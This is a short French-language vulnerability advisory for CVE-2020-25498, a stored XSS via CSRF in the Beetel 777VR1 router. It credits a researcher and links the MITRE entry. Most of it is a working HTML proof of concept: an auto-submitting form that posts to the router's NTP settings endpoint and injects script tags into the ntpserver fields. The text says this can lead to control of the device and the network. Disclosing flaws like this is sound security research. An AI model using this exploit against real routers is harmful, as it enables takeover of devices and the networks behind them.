
XSS stocké via CSRF dans le routeur Beetel 777VR1
Il a été identifié que le point de terminaison vulnérable ne dispose pas de validation d'entrée côté serveur et manque de filtrage côté client pour toute injection de script malveillant. Un attaquant peut utiliser cette vulnérabilité pour injecter un script malveillant dans le point de terminaison, et le script est activé à chaque fois qu'un utilisateur ouvre le point de terminaison vulnérable. L'attaquant peut envoyer une URL malveillante avec une charge utile de requête POST pour exécuter un XSS dans le module admin via CSRF afin de prendre le contrôle de l'appareil et, finalement, de prendre le contrôle du réseau.
Chercheuse : Sayli Ambure (https://twitter.com/sayli_ambure)
Lien CVE MITRE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
Code HTML CSRF :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Paramètre : nom du serveur
Paramètre : mot-clé